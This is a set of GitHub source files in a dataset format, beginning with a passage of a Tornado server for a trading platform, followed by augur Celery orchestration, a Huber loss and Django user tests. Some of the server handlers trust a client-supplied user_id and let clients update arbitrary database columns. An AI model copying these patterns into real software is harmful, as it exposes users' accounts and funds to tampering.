self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 2 and ChinaAreas.parent==provinceid).all()\n print(area_citys)\n area_districts = self.session.query(ChinaAreas.id,ChinaAreas.parent,ChinaAreas.name,ChinaAreas.level).filter(ChinaAreas.level == 3).all()\n\n self.render(\"user/show_add_address.html\", area_provinces=area_provinces,area_citys=area_citys,\n area_districts=area_districts)\n\n\n\n\n\n\n\n\n\nclass UserLoginHandler(BaseHandler):\n def get(self):\n if self.get_current_user():\n self.redirect(\"/user/profile\") # self.redirect 多数情况下被用于用户自定义的情况下进行重定向操作(例如环境变更、用户认证、以及表单提交)\n else:\n self.render(\"user/login.html\", error=None)\n\n @gen.coroutine\n def post(self):\n\n login_name = self.get_argument('login_name')\n login_pass = self.get_argument('login_pass')\n\n user = UserHandler.login(login_name, login_pass)\n\n if not user:\n data = {'result': 'error', 'msg':'用户名或密码错误'}\n else:\n if operator.eq(user.status, User.UserStatusFrozen):\n data = {'result': 'error', 'msg': '当前用户:{},已被冻结,请联系平台了解详情!'.format(user.login_name)}\n elif operator.eq(user.status, User.UserStatusBlack):\n data = {'result': 'error', 'msg': '当前用户:{},已被拉黑,已无权再登录!'.format(user.login_name)}\n else:\n data = {'result': 'success', 'msg':user.id}\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserAjaxLogin(BaseHandler):\n\n @gen.coroutine\n def post(self):\n ajax_login_name= self.get_argument(\"login_name\")\n ajax_login_pass= self.get_argument(\"login_pass\")\n\n user = UserHandler.login( ajax_login_name,ajax_login_pass)\n\n # 判断:用户是否存在\n if not user:\n data ={'result': 'error','msg':'该用户不存在'}\n else:\n data ={'result':'successful','msg':user.id}\n\n self.write(json.JSONEncoder().encode(data))\n\n\n\nclass UserLogoutHandler(BaseHandler):\n def get(self):\n self.clear_cookie(\"wx_user_id\")\n self.clear_cookie(\"wx_user_status\")\n self.redirect(self.get_argument(\"next\", \"/\"))\n\n\nclass UserConsoleHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None) # None为默认值\n if not user_id:\n self.render('error.html', message='参数缺失!')\n return\n\n try:\n user = self.session.query(User).filter(User.deleted == 0, User.id == user_id).one_or_none()\n except DBAPIError as e:\n logging.warning(e.args[0])\n self.render('error.html', message='Error to query user')\n else:\n if user:\n suns = UserHandler.get_suns(user_id, 1)\n self.render('user/console.html', user=user, suns=suns)\n else:\n self.render('error.html', message='Unauthorized access')\n\n\nclass UserProfileHandler(BaseHandler):\n def get(self):\n pass\n\n def post(self):\n user_id = self.get_argument('user_id', None)\n if not user_id:\n self.render('error.html', message='参数缺失!')\n return\n\n try:\n user = self.session.query(User).filter(User.deleted==0,User.id==user_id).one_or_none()\n user_bank = self.session.query(UserBank.bank_no,UserBank.bank_account_name, UserBank.bank_province,UserBank.bank_city ,UserBank.bank_name,UserBank.bank_branch_name).filter(UserBank.deleted==0,UserBank.user_id==user_id).order_by(UserBank.is_default.desc()).all()\n except DBAPIError as e:\n logging.warning(e.args[0])\n self.render('error.html', message='Error to query user')\n else:\n if user:\n self.render('user/profile.html', user=user, banks=user_bank)\n else:\n self.render('error.html', message='Unauthorized access')\n\n\nclass UserUpdateHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id')\n col = self.get_argument('flag')\n value = self.get_argument('value')\n 
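# Note on ShopAddrssHandler above: `.filter(ChinaAreas.level == 2 and
# ChinaAreas.parent == provinceid)` is a classic SQLAlchemy pitfall --
# Python's `and` cannot combine column expressions, so depending on the
# SQLAlchemy version this either raises or silently keeps only one of the
# two conditions. Pass the conditions separately or wrap them in and_():
from sqlalchemy import and_

area_citys = session.query(ChinaAreas).filter(
    and_(ChinaAreas.level == 2, ChinaAreas.parent == provinceid)
).all()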
try:\n self.session.query(User).filter(User.id == user_id).update({col:value})\n self.session.commit()\n except DBAPIError as e:\n self.session.rollback()\n data = {'result':'error','msg':e.args[0]}\n self.write(json.JSONEncoder().encode(data))\n else:\n data = {'result': 'success', 'msg': 'okay'}\n self.write(json.JSONEncoder().encode(data))\n finally:\n self.session.close()\n\nclass UserWalletHandler(BaseHandler):\n def post(self):\n login_name = self.get_argument('username', None)\n user_id = self.get_argument('user_id', None)\n\n if not login_name or not user_id:\n self.render(\"error.html\", message=\"Bad Request\")\n return\n\n money_info = {}\n avaliable_money = UserHandler.get_available_money(user_id)\n in_using_money = UserHandler.get_in_using_money(user_id)\n can_used_money = round((avaliable_money-in_using_money), 2)\n frozen_money = UserHandler.get_frozen_money(user_id)\n money_info['am'] = avaliable_money\n money_info['cum'] = can_used_money\n money_info['fm'] = frozen_money\n\n total_assets = UserHandler.get_total_assets_amount(user_id)\n\n assets_info = UserHandler.get_assets(user_id)\n\n self.render(\"user/wallet.html\", total_assets=total_assets, money_info=money_info, assets_info=assets_info)\n\n\nclass UserOrdersHandler(BaseHandler):\n\n def post(self):\n login_name = self.get_argument('username', None)\n user_id = self.get_argument('user_id', None)\n\n if not login_name or not user_id:\n self.render(\"error.html\", message=\"参数缺失!\")\n return\n\n sub_info = Common.get_user_subscription(session=self.session, user_id=user_id)\n\n self.render(\"user/orders.html\", sub_info=sub_info)\n\nclass UserSubBuyHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n qty = self.get_argument('qty', None)\n price = self.get_argument('price', None)\n p_no = self.get_argument('p_no', None)\n\n if not user_id or not qty or not price or not p_no:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n total_assets = UserHandler.get_total_assets_amount(user_id)\n\n max_qty = 0.2 #g\n\n if operator.eq(total_assets, 0):\n max_qty = 0.2\n if operator.gt(float(qty), max_qty):\n data = {'result': 'error', 'msg': '新用户最多可认购:{}克!'.format(max_qty)}\n self.write(json.JSONEncoder().encode(data))\n return\n else:\n if total_assets >=10000:\n max_qty = 0.4\n elif total_assets >=1000:\n max_qty = 0.2\n else:\n max_qty = 0\n\n if operator.gt(float(qty), max_qty):\n data = {'result': 'error', 'msg': '您总持仓为:{}元,最多可认购:{}克!'.format(total_assets, max_qty)}\n self.write(json.JSONEncoder().encode(data))\n return\n\n\n try:\n order_sub = OrderSub()\n order_sub.user_id = user_id\n order_sub.p_no = 'CZQH'\n order_sub.qty = float(qty)*100\n order_sub.price = float(price)/100.00\n order_sub.amount = float(qty) * float(price)\n order_sub.status = OrderSub.StatusWaitForPaid\n order_sub.unit = 'h'\n order_sub.created_at = time.time()\n\n self.session.add(order_sub)\n self.session.commit()\n except DBAPIError as e:\n self.session.rollback()\n logging.warning(e.args[0])\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n\n data = {'result': 'error', 'msg': '未知错误,请联系平台处理'}\n self.write(json.JSONEncoder().encode(data))\n else:\n data = {'result': 'success', 'msg': order_sub.id}\n self.write(json.JSONEncoder().encode(data))\n finally:\n self.session.close()\n\nclass UserWithdrawHandler(BaseHandler):\n def get(self):\n user_id = self.get_argument('user_id', None)\n\n max_amount = 
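# UserSubBuyHandler above computes order amounts in float arithmetic
# (float(qty) * float(price)); binary floats accumulate rounding error on
# money values. A hedged aside showing the usual alternative -- the values
# below are illustrative, not from the record:
from decimal import Decimal

qty = Decimal('0.2')
price = Decimal('285.50')
amount = qty * price  # exactly Decimal('57.100'), no binary rounding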
UserHandler.get_can_withdraw_money(user_id)\n banks = UserHandler.get_banks(user_id)\n\n self.render('user/withdraw.html', max_amount=max_amount, banks=banks)\n\n def post(self):\n user_id = self.get_argument('user_id', None)\n bank_id = self.get_argument('bank_id', None)\n amount = self.get_argument('amount', None)\n\n if not user_id or not bank_id or not amount:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n maxValue = UserHandler.get_can_withdraw_money(user_id)\n if operator.gt(float(amount), float(maxValue)):\n data = {'result': 'error', 'msg': '提现金额不得大于:{}'.format(maxValue)}\n self.write(json.JSONEncoder().encode(data))\n return\n\n uw = UserWithdraw()\n uw.user_id = user_id\n uw.bank_id = bank_id\n uw.amount = amount\n uw.status = UserWithdraw.StatusPending\n\n self.session.add(uw)\n\n try:\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': '提现申请失败,请稍后尝试!'}\n else:\n data = {'result': 'success', 'msg': 'successfully!'}\n finally:\n self.session.close()\n\n\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserWithdrawHistoryHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n records = UserHandler.get_withdraw_history(user_id)\n self.render('user/withdraw-history.html', histories=records)\n\nclass UserDepositHistoryHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n records = UserHandler.get_deposit_history(user_id)\n\n self.render('user/deposit-history.html', histories=records)\n\nclass UserBuyHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n price = self.get_argument('price', None)\n qty = self.get_argument('qty', None)\n\n if not p_no or not user_id or not price or not qty:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n result,message = OrderHandler.insert_buy_order(user_id,p_no,qty,price)\n\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config','channels')['matching'],json.JSONEncoder().encode({'P_NO':p_no}))\n data = {'result': 'success', 'msg': '委托成功!'}\n self.write(json.JSONEncoder().encode(data))\n\n\nclass UserSaleHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n price = self.get_argument('price', None)\n qty = self.get_argument('qty', None)\n\n if not p_no or not user_id or not price or not qty:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n result,message = OrderHandler.insert_sale_order(user_id,p_no,qty,price)\n\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config','channels')['matching'], json.JSONEncoder().encode({'P_NO': p_no}))\n data = {'result': 'success', 'msg': '委托成功!'}\n\n self.write(json.JSONEncoder().encode(data))\n\nclass BankCreateHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n bank_no = self.get_argument('bank_no', None)\n bank_account_name = self.get_argument('bank_account_name', 
None)\n bank_province = self.get_argument('bank_province', None)\n bank_city = self.get_argument('bank_city', None)\n bank_name = self.get_argument('bank_name', None)\n bank_branch_name = self.get_argument('bank_branch_name', None)\n is_default = self.get_argument('is_default', 0)\n\n if not user_id or \\\n not bank_no or \\\n not bank_account_name or \\\n not bank_province or \\\n not bank_city or \\\n not bank_name or \\\n not bank_branch_name:\n data = {'result': 'error', 'msg': '参数缺失!'}\n self.write(json.JSONEncoder().encode(data))\n return\n\n ub = UserBank()\n ub.user_id = user_id\n ub.bank_no = bank_no\n ub.bank_account_name = bank_account_name\n ub.bank_province = bank_province\n ub.bank_city = bank_city\n ub.bank_name = bank_name\n ub.bank_branch_name = bank_branch_name\n ub.is_default = is_default\n\n try:\n self.session.add(ub)\n self.session.commit()\n except DBAPIError as e:\n print(e.args[0])\n data = {'result': 'error', 'msg': 'Error to save!'}\n else:\n data = {'result': 'success', 'msg': 'successfully!'}\n finally:\n self.session.close()\n\n self.write(json.JSONEncoder().encode(data))\n\n\n\n\n\n\nclass EntryModule(tornado.web.UIModule):\n\n def render(self, entry):\n return self.render_string(\"modules/entry.html\", entry=entry)\n\n\nclass ProductListHandler(BaseHandler):\n\n def post(self):\n\n data = ProductHandler.get_app_products_list()\n\n self.render(\"product/list.html\", data=data)\n\nclass ProductDetailHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no',None)\n if not p_no:\n self.render('error.html', message='Product no is empty')\n\n segment = self.get_argument('segment', None)\n\n if not segment:\n info = ProductHandler.get_app_product_info(p_no)\n\n x_times = ProductHandler.get_transaction_times(p_no)\n d_price = []\n a_price = []\n d_volume = []\n\n data = OrderDealHandler.get_deal_data(p_no)\n\n for t, dp, ap, dv in data:\n #x_times.append(t)\n d_price.append(dp)\n a_price.append(ap)\n d_volume.append(dv)\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session, p_no) #Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session, p_no) #Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n\n kdata = Common.get_k_data(self.session,p_no)\n\n self.render('product/detail.html', info=info, x=x_times, dp=d_price,ap=a_price,dv=d_volume, bi=bIndex, sd5=sale_5, bd5=buy_5, kd=kdata)\n else:\n if operator.eq(segment,'general'):\n info = ProductHandler.get_app_product_info(p_no)\n\n self.render('product/detail-general.html', info=info)\n elif operator.eq(segment, 'chart-time'):\n x_times = []\n d_price = []\n a_price = []\n d_volume = []\n\n data = OrderDealHandler.get_deal_data(p_no)\n\n for t, dp, ap, dv in data:\n x_times.append(t)\n d_price.append(dp)\n a_price.append(ap)\n d_volume.append(dv)\n\n kdata = Common.get_k_data(self.session, p_no)\n\n data = {'xt':x_times,'dp':d_price,'ap':a_price,'dv':d_volume}\n\n self.write(json.JSONEncoder().encode(data))\n elif operator.eq(segment, 'chart-k'):\n kdata = Common.get_k_data(self.session, p_no)\n\n self.write(json.JSONEncoder().encode(kdata))\n elif operator.eq(segment, 'bs5'):\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session, p_no)\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session, p_no)\n\n self.render('product/detail-bs5.html', bi=bIndex, sd5=sale_5, bd5=buy_5)\n elif operator.eq(segment, 'info'):\n 
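# The segment handling in ProductDetailHandler above is a ladder of
# operator.eq(segment, ...) tests, which in plain Python are just string
# comparisons. A hypothetical simplification (the per-segment methods below
# do not exist in the record; they stand in for the elif bodies):
def handle_segment(self, segment, p_no):
    handlers = {
        'general': self.render_general,
        'chart-time': self.render_chart_time,
        'chart-k': self.render_chart_k,
        'bs5': self.render_bs5,
        'info': self.render_info,
    }
    return handlers[segment](p_no)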
self.render('product/detail-info.html')\n\nclass ProductBuyHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n if not p_no or not user_id:\n self.render('error.html', message='Product no or user id is empty')\n\n pinfo = ProductHandler.get_app_product_info(p_no)#contain current_price\n can_used_money = UserHandler.get_can_used_money(user_id)\n current_price = ProductHandler.get_current_price(p_no)\n max_buy_volume = math.floor(float(can_used_money)/float(current_price))\n up_stop_price = ProductHandler.get_up_stop_price(p_no)\n down_stop_price = ProductHandler.get_down_stop_price(p_no)\n\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n #print(buy_5)\n #if buy_5 and len(buy_5)>0:\n # buy_5.reverse()\n\n\n self.render('product/buy.html', info=pinfo, cum=can_used_money,cp=current_price,mbv=max_buy_volume, usp=up_stop_price, dsp=down_stop_price,bi=bIndex, sd5=sale_5, bd5=buy_5)\n\nclass ProductSaleHandler(BaseHandler):\n def post(self):\n p_no = self.get_argument('p_no', None)\n user_id = self.get_argument('user_id', None)\n if not p_no or not user_id:\n self.render('error.html', message='Product no or user id is empty')\n\n pinfo = ProductHandler.get_app_product_info(p_no)\n can_sold_product = UserHandler.get_can_sale_asset_volume(user_id, p_no)\n current_price = ProductHandler.get_current_price(p_no)\n up_stop_price = ProductHandler.get_up_stop_price(p_no)\n down_stop_price = ProductHandler.get_down_stop_price(p_no)\n\n bIndex = ['一', '二', '三', '四', '五']\n sale_5 = Common.get_top_5_delegate_sale_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'S')\n\n buy_5 = Common.get_top_5_delegate_buy_orders(self.session,\n p_no) # Common.get_lastest_5_delegate_orders(self.session, p_no, 'B')\n\n self.session.close()\n #if buy_5 and len(buy_5)>0:\n # buy_5.reverse()\n\n self.render('product/sale.html', info=pinfo, csp=can_sold_product, cp=current_price,\n usp=up_stop_price, dsp=down_stop_price, bi=bIndex, sd5=sale_5, bd5=buy_5)\n\n\nclass ProductOrderHandler(BaseHandler):\n def post(self):\n\n user_id = self.get_argument('user_id',None)\n if not user_id:\n self.render('error.html',message='参数错误!')\n return\n records = OrderHandler.get_my_delegates(user_id)\n self.render('product/order.html', os=records)\n\nclass ProductAssetsHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n\n if not user_id:\n self.render('error.html', message='参数错误!')\n return\n\n assets = UserHandler.get_assets(user_id)\n self.render('product/assets.html', assets=assets)\n\nclass OrderCancelHandler(BaseHandler):\n def post(self):\n user_id = self.get_argument('user_id', None)\n order_id = self.get_argument('oid', None)\n\n if not user_id or not order_id:\n self.render('error.html',message='参数错误!')\n return\n\n result, message, p_no = OrderHandler.do_cancel(user_id, order_id)\n if not result:\n data = {'result': 'error', 'msg': message}\n else:\n self.redis.publish(ConfigParser.get('wx.redis.config', 'channels')['matching'],\n json.JSONEncoder().encode({'P_NO': p_no}))\n data = {'result': 'success', 'msg': '撤销成功!'}\n\n self.write(json.JSONEncoder().encode(data))\n\nclass 
TransactionSocketHandler(tornado.websocket.WebSocketHandler):\n\n waiters = set()\n\n @property\n def redis(self):\n return self.application.redis\n\n def open(self):\n TransactionSocketHandler.waiters.add(self)\n\n def on_close(self):\n TransactionSocketHandler.waiters.remove(self)\n\n @classmethod\n def broadcast(cls, msg):\n logging.info('Sending message to %d waiters', len(cls.waiters))\n for waiter in cls.waiters:\n try:\n waiter.write_message(msg)\n except:\n logging.error(\"Error sending message\", exc_info=True)\n\n def send_response(self, response):\n try:\n self.write_message(response)\n except:\n logging.error('Error to send message:{}'.format(response), exc_info=True)\n\n def on_message(self, message):\n logging.info('Get message %r', message)\n\n #TODO process get messsage\n\n response = Command.process_websoket_command(message, self.redis)\n\n response_msg = response\n #TransactionSocketHandler.send_updates(response_msg)\n #response_msg = Command.process(tornado.escape.json_decode(message), self.application.redis)\n\n self.send_response(response_msg)\n\n\nclass TransactionProductsHandler(BaseHandler):\n\n def post(self):\n try:\n products = self.session.query(Product).all()\n except DBAPIError as e :\n self.session.rollback()\n if e.connection_invalidated:\n logging.warning('database connection invalid')\n finally:\n self.session.close()\n\n result = []\n for product in products:\n result.append(product.as_dict())\n self.write(json.JSONEncoder().encode(result))\n return\n\n\ndef main():\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(ConfigParser.get('wx.web.server.config', 'port'))\n ioloop.IOLoop.current().start()\n\n\nif __name__ == '__main__':\n main()","repo_name":"woniucao520/Python_studying","sub_path":"2018/wxpm-server-new1225/WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":47445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"33548571226","text":"from logging import getLogger\nfrom shutil import copytree\nfrom typing import Tuple\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom virtool.example import example_path\nfrom virtool.subtractions.files import create_subtraction_files\nfrom virtool.subtractions.utils import FILES\nfrom virtool.subtractions.db import finalize\nfrom virtool.types import App\nfrom virtool.uploads.models import Upload\n\nlogger = getLogger(__name__)\n\n\nasync def create_fake_fasta_upload(app: App, user_id: str) -> Tuple[int, str]:\n async with AsyncSession(app[\"pg\"]) as session:\n upload = Upload(name=\"test.fa.gz\", type=\"subtraction\", user=user_id)\n\n session.add(upload)\n await session.flush()\n\n upload_id = upload.id\n upload_name = upload.name\n\n await session.commit()\n\n return upload_id, upload_name\n\n\nasync def create_fake_finalized_subtraction(\n app: App, upload_id: int, upload_name: str, subtraction_id: str, user_id: str\n):\n db = app[\"db\"]\n pg = app[\"pg\"]\n\n document = await db.subtraction.insert_one(\n {\n \"_id\": subtraction_id,\n \"name\": \"subtraction_1\",\n \"nickname\": \"\",\n \"deleted\": False,\n \"ready\": True,\n \"file\": {\"id\": upload_id, \"name\": upload_name},\n \"user\": {\"id\": user_id},\n }\n )\n\n subtractions_path = (\n app[\"config\"].data_path\n / \"subtractions\"\n / subtraction_id.replace(\" \", \"_\").lower()\n )\n\n subtractions_example_path = example_path / \"subtractions\" / \"arabidopsis_thaliana\"\n\n copytree(subtractions_example_path, 
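# In TransactionProductsHandler above, if the query raises, `products` is
# never bound and the loop after the try block fails with UnboundLocalError.
# A sketch of the safer shape, using the record's own names:
def post(self):
    products = []
    try:
        products = self.session.query(Product).all()
    except DBAPIError as e:
        self.session.rollback()
        if e.connection_invalidated:
            logging.warning('database connection invalid')
    finally:
        self.session.close()
    self.write(json.JSONEncoder().encode([p.as_dict() for p in products]))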
subtractions_path, dirs_exist_ok=True)\n\n await create_subtraction_files(pg, document[\"_id\"], FILES, subtractions_path)\n\n return await finalize(\n db,\n pg,\n subtraction_id,\n gc={\"a\": 0.25, \"t\": 0.25, \"g\": 0.25, \"c\": 0.25},\n count=100,\n )\n","repo_name":"ryanfang5/virtool","sub_path":"virtool/subtractions/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"21528690901","text":"from __future__ import annotations\nfrom typing import List\nimport time\nimport logging\nimport json\nimport os\nfrom enum import Enum\n\nfrom celery.result import AsyncResult\nfrom celery import signature\nfrom celery import group, chain, chord, signature\n\n\nfrom augur.tasks.github import *\nif os.environ.get('AUGUR_DOCKER_DEPLOY') != \"1\":\n from augur.tasks.data_analysis import *\nfrom augur.tasks.github.detect_move.tasks import detect_github_repo_move\nfrom augur.tasks.github.releases.tasks import collect_releases\nfrom augur.tasks.github.repo_info.tasks import collect_repo_info\nfrom augur.tasks.github.pull_requests.files_model.tasks import process_pull_request_files\nfrom augur.tasks.github.pull_requests.commits_model.tasks import process_pull_request_commits\nfrom augur.tasks.git.facade_tasks import *\nfrom augur.tasks.db.refresh_materialized_views import *\n# from augur.tasks.data_analysis import *\nfrom augur.tasks.init.celery_app import celery_app as celery\nfrom celery.result import allow_join_result\nfrom augur.application.logs import AugurLogger\nfrom augur.application.db.session import DatabaseSession\nfrom augur.tasks.init.celery_app import engine\nfrom augur.application.db.util import execute_session_query\nfrom logging import Logger\n\nCELERY_GROUP_TYPE = type(group())\nCELERY_CHAIN_TYPE = type(chain())\n\n#Predefine phases. For new phases edit this and the config to reflect.\n#The domain of tasks ran should be very explicit.\ndef prelim_phase(logger):\n\n tasks_with_repo_domain = []\n\n with DatabaseSession(logger) as session:\n query = session.query(Repo)\n repos = execute_session_query(query, 'all')\n\n for repo in repos:\n tasks_with_repo_domain.append(detect_github_repo_move.si(repo.repo_git))\n\n #preliminary_task_list = [detect_github_repo_move.si()]\n preliminary_tasks = group(*tasks_with_repo_domain)\n return preliminary_tasks\n\ndef repo_collect_phase(logger):\n #Here the term issues also includes prs. 
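# This record composes collection phases from Celery canvas primitives. A
# minimal standalone sketch of those primitives -- the app and task below
# are illustrative, not from the augur codebase: group() runs signatures in
# parallel, chain() orders them.
from celery import Celery, chain, group

app = Celery('demo', broker='memory://localhost/')

@app.task
def step(x):
    return x

# the grouped steps may run in parallel; step.si(3) runs after both finish
workflow = chain(group(step.si(1), step.si(2)), step.si(3))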
This list is a bunch of chains that run in parallel to process issue data.\n issue_dependent_tasks = []\n #repo_info should run in a group\n repo_info_tasks = []\n #A chain is needed for each repo.\n with DatabaseSession(logger) as session:\n query = session.query(Repo)\n repos = execute_session_query(query, 'all')\n #Just use list comprehension for simple group\n repo_info_tasks = [collect_repo_info.si(repo.repo_git) for repo in repos]\n\n for repo in repos:\n first_tasks_repo = group(collect_issues.si(repo.repo_git),collect_pull_requests.si(repo.repo_git))\n second_tasks_repo = group(collect_events.si(repo.repo_git),\n collect_github_messages.si(repo.repo_git),process_pull_request_files.si(repo.repo_git), process_pull_request_commits.si(repo.repo_git))\n\n repo_chain = chain(first_tasks_repo,second_tasks_repo)\n issue_dependent_tasks.append(repo_chain)\n\n repo_task_group = group(\n *repo_info_tasks,\n chain(group(*issue_dependent_tasks),process_contributors.si()),\n generate_facade_chain(logger),\n collect_releases.si()\n )\n \n return chain(repo_task_group, refresh_materialized_views.si())\n\n\nDEFINED_COLLECTION_PHASES = [prelim_phase, repo_collect_phase]\nif os.environ.get('AUGUR_DOCKER_DEPLOY') != \"1\":\n DEFINED_COLLECTION_PHASES.append(machine_learning_phase)\n\n\nclass AugurTaskRoutine:\n \"\"\"class to keep track of various groups of collection tasks as well as how they relate to one another.\n Accessible like a dict, each dict item represents a 'phase' of augur collection executed more or less in parallel.\n\n Attributes:\n logger (Logger): Get logger from AugurLogger\n jobs_dict (dict): Dict of data collection phases to run\n collection_phases (List[str]): List of phases to run in augur collection.\n \"\"\"\n def __init__(self,collection_phases: List[str]=[]):\n self.logger = AugurLogger(\"data_collection_jobs\").get_logger()\n #self.session = TaskSession(self.logger)\n self.jobs_dict = {}\n self.collection_phases = collection_phases\n #self.disabled_collection_tasks = disabled_collection_tasks\n\n #Assemble default phases\n #These will then be able to be overridden through the config.\n for phase in collection_phases:\n self.jobs_dict[phase.__name__] = phase\n\n #Get and set dict values that correspond to phases of collection\n def __getitem__(self,key: str) -> dict:\n \"\"\"Return the collection group with the specified key.\n \"\"\"\n return self.jobs_dict[key]\n \n def __setitem__(self,key: str,newJobs):\n \"\"\"Create a new collection job group with the name of the key specified.\n \"\"\"\n self.collection_phases.append(newJobs)\n self.jobs_dict[key] = newJobs\n\n def start_data_collection(self):\n \"\"\"Start all task items and return.\n \"\"\"\n self.logger.info(\"Starting augur collection\")\n\n self.logger.info(f\"Enabled phases: {list(self.jobs_dict.keys())}\")\n augur_collection_list = []\n for phaseName, job in self.jobs_dict.items():\n self.logger.info(f\"Starting phase {phaseName}\")\n #Call the function stored in the dict to return the object to call apply_async on\n\n try:\n tasks = job(self.logger)\n phaseResult = tasks.apply_async() \n\n # if the job is a group of tasks then join the group\n if isinstance(tasks, CELERY_GROUP_TYPE): \n with allow_join_result():\n phaseResult.join()\n\n except Exception as e:\n #Log full traceback if a phase fails.\n self.logger.error(\n ''.join(traceback.format_exception(None, e, e.__traceback__)))\n self.logger.error(\n f\"Phase {phaseName} has failed during augur collection. 
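# AugurTaskRoutine.__init__ above declares `collection_phases: List[str]=[]`,
# a mutable default argument: the same list object is shared by every call
# that omits the parameter. The conventional fix:
def __init__(self, collection_phases=None):
    self.collection_phases = [] if collection_phases is None else list(collection_phases)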
Error: {e}\")\n raise e\n\n\n #self.logger.info(f\"Result of {phaseName} phase: {phaseResult.status}\")\n\n\n@celery.task\ndef start_task():\n\n logger = logging.getLogger(start_task.__name__)\n\n #Get phase options from the config\n with DatabaseSession(logger) as session:\n config = session.config\n phase_options = config.get_section(\"Task_Routine\")\n\n #Get list of enabled phases \n enabled_phase_names = [name for name, phase in phase_options.items() if phase == 1]\n enabled_phases = [phase for phase in DEFINED_COLLECTION_PHASES if phase.__name__ in enabled_phase_names]\n\n #print(f\"disabled: {disabled_phases}\")\n augur_collection = AugurTaskRoutine(collection_phases=enabled_phases)\n\n augur_collection.start_data_collection()\n\n\n\n\n\n","repo_name":"cvaughn-anaconda/augur","sub_path":"augur/tasks/start_tasks.py","file_name":"start_tasks.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29702124087","text":"import keras.backend as K\nimport tensorflow as tf\n\n\n# Huber loss for DQN\ndef huber_loss(y_true, y_pred, clip_delta=1.0):\n error = y_true - y_pred\n cond = K.abs(error) <= clip_delta\n squared_loss = 0.5 * K.square(error)\n quadratic_loss = 0.5 * K.square(clip_delta) + clip_delta * (K.abs(error) - clip_delta)\n return K.mean(tf.where(cond, squared_loss, quadratic_loss))\n","repo_name":"doandongnguyen/FuzzyDQN","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"83"} +{"seq_id":"26635292743","text":"import pytest\nfrom django.contrib.auth.models import User\n\nfrom .data import *\n\n\n@pytest.mark.django_db\ndef test_register_user(client):\n payload = USER_1\n response = client.post(\"/api/users/\", payload)\n\n assert response.data['username'] == payload['username']\n assert response.status_code == 201\n assert User.objects.count() == 1\n assert 'password' in response.data\n\n\n@pytest.mark.django_db\ndef test_register_user_fail_data(client):\n payload = USER_FAIL # don't have password\n response = client.post(\"/api/users/\", payload)\n\n assert response.status_code == 400\n assert bool(response.data['password'])\n\n\n@pytest.mark.django_db\ndef test_login_user(client, user):\n response = client.post('/api/login/', USER_1)\n\n assert response.status_code == 302 # redirect to the wallets page\n assert response.url == '/api/wallets/'\n\n\n@pytest.mark.django_db\ndef test_login_user_fail_data(client):\n response = client.post('/api/login/', dict(\n username='testuserfail',\n password='test123'\n ))\n assert response.status_code == 200 # it's standard work of Django\n\n\n@pytest.mark.django_db\ndef test_get_list_users_auth_user(auth_user, admin):\n response = auth_user.get('/api/users/')\n\n assert response.status_code == 200\n assert len(response.data) == 1\n assert User.objects.count() == 2\n\n@pytest.mark.django_db\ndef test_get_list_users_admin(auth_admin, user):\n response = 